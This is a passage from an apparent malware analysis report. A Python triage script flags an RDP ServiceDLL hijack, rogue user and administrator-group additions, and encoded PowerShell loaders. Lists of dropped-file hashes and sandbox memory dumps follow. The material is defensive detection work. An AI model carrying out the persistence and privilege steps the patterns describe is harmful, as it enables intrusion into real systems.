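    # The legitimate value is %SystemRoot%\System32\termsrv.dll; anything else is a hijack.
    if dll is not None and not dll.lower().endswith("\\system32\\termsrv.dll"):
        tags.append("termservice_servicedll_hijack")
    if NET_USER_ADD_RE.search(cmdline):
        tags.append("local_user_add")
    m = NET_GROUP_ADD_RE.search(cmdline)
    if m:
        group = m.group(1).strip('"').lower()
        if group == "administrators":
            tags.append("administrators_group_add")
        elif group == "remote desktop users":
            tags.append("rdp_group_add")
    if decode_encoded_command(cmdline) is not None:
        tags.append("encoded_powershell")
    if re.search(r"\bdel\b.*\.ps1", cmdline, re.I):
        tags.append("script_cleanup")
    return tags


def triage(cmdlines):
    """Map each tag to the command lines carrying it. URLs found inside decoded
    -enc payloads are collected under 'payload_url' so the loader location is
    visible without opening the blob by hand."""
    findings = {}
    for line in cmdlines:
        for tag in classify(line):
            findings.setdefault(tag, []).append(line)
        decoded = decode_encoded_command(line)
        if decoded:
            for url in URL_RE.findall(decoded):
                findings.setdefault("payload_url", []).append(url)
    return findings


if __name__ == "__main__":
    for tag, hits in sorted(triage(REPORT_COMMAND_LINES).items()):
        print(tag)
        for hit in hits:
            print("   ", hit[:100])
```

Run against the report's own command lines the script yields every tag in the chain plus the speed.ps1 URL; fed a legitimate `reg add ... /v ServiceDLL /d %SystemRoot%\System32\termsrv.dll` it stays silent, which is the check that keeps the ServiceDLL rule from firing on repair scripts. The regexes are deliberately loose about quoting and case because `net`, `net1`, `reg` and `powershell` all appear here with mixed case and with or without quoted image paths.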
Downloads
- C:\Users\Admin\AppData\Local\Temp\RESCC7.tmp
  MD5: b3ed24cfd539c757ba78cc9d5a179adf
  SHA1: 0560de4cc03ed282cdce5d7ba2238f831069415c
  SHA256: 637fb9901f4eb7e86f5bab67dc4f7a122ed53d335e7bcfd2f9150c5f3f982dfc
  SHA512: 4a705be11f7a55f47dda7c709cf8bf400de85c9f091371c643199c53301b2f1087e79e065ab645e15b476964632f3ca9cf96a0d2e8f61329cac1992827f9ebcf
- C:\Users\Admin\AppData\Local\Temp\Setup.zip
  MD5: 36f178576dcb8db35d6f06448b1eb510
  SHA1: 62277c90cc2b1bb81b36571037afe5081b0605d5
  SHA256: 192fed6a13a0e73d5196a43bc72eeac16e4962ce465ea67dd60d8b16368c215a
  SHA512: 9e1dfe8e5196afb5a39d5302d6948cc7282b95c77aba435ed14453094022a302a6c780fbfd2615377d94e2b7e2913601e9129eb6d3398db0ba25344075e5dc96
- C:\Users\Admin\AppData\Local\Temp\ViJoy.exe (listed twice in the original report with identical hashes)
  MD5: 03051f3c44a2c8d196c95ea458b0aff4
  SHA1: d19a86e11cccdf978ca2d1455d7026d7879869f7
  SHA256: 555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08
  SHA512: 883e31033107ee9f008d34e84638fca2ee085e6cc7c41a288d1663a31beac7109efe718ab7f38f682c8e01a99736e3832c539c95fd4bf25124fed4c9e9eeba46
- C:\Users\Admin\AppData\Local\Temp\f0xtmrhz\f0xtmrhz.dll
  MD5: 78316c923481b1f1c3dbebf3b3bac369
  SHA1: 45f6ca94d5d00b2f54ee2f82ba728397ca664aaa
  SHA256: 2f683842fbb64a1e0c816525c01fa5fcad453b3b3e34b6acc0aba6f4c59b3068
  SHA512: 7415c49ddf3f38dc8d7c166c649c0ad7609794d87b156871d57338398566f9d1ad91e653057895edfe53345bf7293b3ad2d693dd1084ac09abad45d855f4a173
- C:\Users\Admin\AppData\Local\Temp\ready.ps1
  MD5: 3447df88de7128bdc34942334b2fab98
  SHA1: 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
  SHA256: 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
  SHA512: 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
- C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
  MD5: 43473f4e719958639a9d89e5d8388999
  SHA1: ccb79eb606a23daa4b3ff8f996a2fbf281f31491
  SHA256: ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734
  SHA512: 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa
-
C:\Users\Admin\AppData\Roaming\Templers\exe1.exeMD5
eaee663dfeb2efcd9ec669f5622858e2
SHA12b96f0d568128240d0c53b2a191467fde440fd93
SHA2566c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
SHA512211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
-
C:\Users\Admin\AppData\Roaming\Templers\exe1.exeMD5
eaee663dfeb2efcd9ec669f5622858e2
SHA12b96f0d568128240d0c53b2a191467fde440fd93
SHA2566c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
SHA512211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
-
C:\Users\Admin\AppData\Roaming\Templers\exe2.exeMD5
c9622e294a0f3c6c4dfcf716cd2e6692
SHA1829498d010f331248be9fd512deb44d1eceac344
SHA256f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe
SHA512d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552
-
C:\Users\Admin\AppData\Roaming\Templers\exe2.exeMD5
c9622e294a0f3c6c4dfcf716cd2e6692
SHA1829498d010f331248be9fd512deb44d1eceac344
SHA256f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe
SHA512d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exeMD5
27cfb3990872caa5930fa69d57aefe7b
SHA15e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f
SHA25643881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146
SHA512a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exeMD5
27cfb3990872caa5930fa69d57aefe7b
SHA15e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f
SHA25643881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146
SHA512a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exe.configMD5
ad0967a0ab95aa7d71b3dc92b71b8f7a
SHA1ed63f517e32094c07a2c5b664ed1cab412233ab5
SHA2569c1212bc648a2533b53a2d0afcec518846d97630afb013742a9622f0df7b04fc
SHA51285766a907331f60044ec205cf345453fc3d44bfcac296ac93a12e8a752b84290dfd94f73b71de82f46f9503177d29602cbb87549f89dc61373d889b4ea26634b
-
\??\c:\Users\Admin\AppData\Local\Temp\f0xtmrhz\CSCE599C57EBA6F41B09372974D9DECE673.TMPMD5
7674fb62b97c681ba739627ccfa831f1
SHA1c7c9a294859087205b4a4234cef9cf2ffd1d0688
SHA256a3d37ae906cc1ad031b142902fa4af7783bc6b16c34f7fb932cfd1effe426446
SHA512840543ce21f25ea320b7e60947868c83d34a45bef5995c9cfee8d26b179f11b5987d35dcd1e2df84e0b52fcccc17597c77578e83b4970fcb175860dea1b592fb
-
\??\c:\Users\Admin\AppData\Local\Temp\f0xtmrhz\f0xtmrhz.0.csMD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
\??\c:\Users\Admin\AppData\Local\Temp\f0xtmrhz\f0xtmrhz.cmdlineMD5
c5b8b4d6484df600c9ad1efb4e8cb2dd
SHA171e459785921e7130dbe889aceb0c645ec8d6f4b
SHA25653feec5f42db1f6d56f7a5c2a4e92b3e94be377cb72fccc429546a057b38b544
SHA5127ed4359aeb5038849cea88d534918523a52d7ae62b886efe2f87ff8c432f0bef7881a472ada49ef23b55d19dd7d80679f0984ded8e08ba8f83f4fe4c117d0d35
-
\Windows\Branding\mediasrv.pngMD5
271eacd9c9ec8531912e043bc9c58a31
SHA1c86e20c2a10fd5c5bae4910a73fd62008d41233b
SHA256177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934
SHA51287375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0
-
\Windows\Branding\mediasvc.pngMD5
1fa9c1e185a51b6ed443dd782b880b0d
SHA150145abf336a196183882ef960d285bd77dd3490
SHA256f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959
SHA51216bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc
-
memory/1028-318-0x0000000000000000-mapping.dmp
-
memory/1868-114-0x0000000000C70000-0x0000000000C71000-memory.dmpFilesize
4KB
-
memory/1868-116-0x0000000001990000-0x0000000001992000-memory.dmpFilesize
8KB
-
memory/2152-125-0x0000000000000000-mapping.dmp
-
memory/2760-362-0x0000000000000000-mapping.dmp
-
memory/2784-160-0x0000024CB8C80000-0x0000024CB8C81000-memory.dmpFilesize
4KB
-
memory/2784-153-0x0000024CB8BD3000-0x0000024CB8BD5000-memory.dmpFilesize
8KB
-
memory/2784-152-0x0000024CB8BD0000-0x0000024CB8BD2000-memory.dmpFilesize
8KB
-
memory/2784-154-0x0000024CB8BD6000-0x0000024CB8BD8000-memory.dmpFilesize
8KB
-
memory/2784-141-0x0000024CB8C30000-0x0000024CB8C31000-memory.dmpFilesize
4KB
-
memory/2784-170-0x0000024CD15D0000-0x0000024CD15D1000-memory.dmpFilesize
4KB
-
memory/2784-144-0x0000024CD0F50000-0x0000024CD0F51000-memory.dmpFilesize
4KB
-
memory/2784-171-0x0000024CD1960000-0x0000024CD1961000-memory.dmpFilesize
4KB
-
memory/2784-180-0x0000024CB8BD8000-0x0000024CB8BD9000-memory.dmpFilesize
4KB
-
memory/2784-136-0x0000000000000000-mapping.dmp
-
memory/3016-123-0x0000000005C50000-0x0000000005C51000-memory.dmpFilesize
4KB
-
memory/3016-122-0x0000000005C10000-0x0000000005C41000-memory.dmpFilesize
196KB
-
memory/3016-120-0x0000000000D30000-0x0000000000D31000-memory.dmpFilesize
4KB
-
memory/3016-117-0x0000000000000000-mapping.dmp
-
memory/3176-371-0x0000000000000000-mapping.dmp
-
memory/3708-374-0x0000000000000000-mapping.dmp
-
memory/3988-129-0x00000234C4ED0000-0x00000234C517A000-memory.dmpFilesize
2.7MB
-
memory/3988-134-0x00000234C4C16000-0x00000234C4C17000-memory.dmpFilesize
4KB
-
memory/3988-133-0x00000234C4C15000-0x00000234C4C16000-memory.dmpFilesize
4KB
-
memory/3988-124-0x0000000000000000-mapping.dmp
-
memory/3988-131-0x00000234C4C10000-0x00000234C4C12000-memory.dmpFilesize
8KB
-
memory/3988-132-0x00000234C4C13000-0x00000234C4C15000-memory.dmpFilesize
8KB
-
memory/4112-375-0x0000000000000000-mapping.dmp
-
memory/4116-150-0x0000000000000000-mapping.dmp
-
memory/4152-376-0x0000000000000000-mapping.dmp
-
memory/4156-156-0x0000000000000000-mapping.dmp
-
memory/4164-372-0x0000000000000000-mapping.dmp
-
memory/4196-373-0x0000000000000000-mapping.dmp
-
memory/4200-179-0x00000000011A0000-0x00000000011A2000-memory.dmpFilesize
8KB
-
memory/4200-162-0x0000000000000000-mapping.dmp
-
memory/4224-317-0x0000000000000000-mapping.dmp
-
memory/4240-316-0x0000000000000000-mapping.dmp
-
memory/4268-377-0x0000000000000000-mapping.dmp
-
memory/4268-465-0x0000000000000000-mapping.dmp
-
memory/4288-379-0x0000000000000000-mapping.dmp
-
memory/4312-380-0x0000000000000000-mapping.dmp
-
memory/4316-228-0x000001C64F408000-0x000001C64F40A000-memory.dmpFilesize
8KB
-
memory/4316-178-0x0000000000000000-mapping.dmp
-
memory/4316-189-0x000001C64F400000-0x000001C64F402000-memory.dmpFilesize
8KB
-
memory/4316-190-0x000001C64F403000-0x000001C64F405000-memory.dmpFilesize
8KB
-
memory/4316-200-0x000001C64F406000-0x000001C64F408000-memory.dmpFilesize
8KB
-
memory/4324-464-0x0000000000000000-mapping.dmp
-
memory/4332-378-0x0000000000000000-mapping.dmp
-
memory/4340-356-0x0000000000000000-mapping.dmp
-
memory/4380-384-0x0000000000000000-mapping.dmp
-
memory/4380-450-0x000001C4FCC68000-0x000001C4FCC69000-memory.dmpFilesize
4KB
-
memory/4380-397-0x000001C4FCC60000-0x000001C4FCC62000-memory.dmpFilesize
8KB
-
memory/4380-398-0x000001C4FCC63000-0x000001C4FCC65000-memory.dmpFilesize
8KB
-
memory/4380-399-0x000001C4FCC66000-0x000001C4FCC68000-memory.dmpFilesize
8KB
-
memory/4392-383-0x0000000000000000-mapping.dmp
-
memory/4572-381-0x0000000000000000-mapping.dmp
-
memory/4656-382-0x0000000000000000-mapping.dmp
-
memory/4728-355-0x0000000000000000-mapping.dmp
-
memory/4752-229-0x00000164ACFE0000-0x00000164ACFE2000-memory.dmpFilesize
8KB
-
memory/4752-222-0x0000000000000000-mapping.dmp
-
memory/4752-230-0x00000164ACFE3000-0x00000164ACFE5000-memory.dmpFilesize
8KB
-
memory/4752-265-0x00000164ACFE6000-0x00000164ACFE8000-memory.dmpFilesize
8KB
-
memory/4768-359-0x0000000000000000-mapping.dmp
-
memory/4812-360-0x0000000000000000-mapping.dmp
-
memory/4856-361-0x0000000000000000-mapping.dmp
-
memory/4904-363-0x0000000000000000-mapping.dmp
-
memory/4920-364-0x0000000000000000-mapping.dmp
-
memory/4936-365-0x0000000000000000-mapping.dmp
-
memory/4956-366-0x0000000000000000-mapping.dmp
-
memory/5000-369-0x0000000000000000-mapping.dmp
-
memory/5012-370-0x0000000000000000-mapping.dmp
-
memory/5016-260-0x0000000000000000-mapping.dmp
-
memory/5016-300-0x00000264FE756000-0x00000264FE758000-memory.dmpFilesize
8KB
-
memory/5016-298-0x00000264FE750000-0x00000264FE752000-memory.dmpFilesize
8KB
-
memory/5016-299-0x00000264FE753000-0x00000264FE755000-memory.dmpFilesize
8KB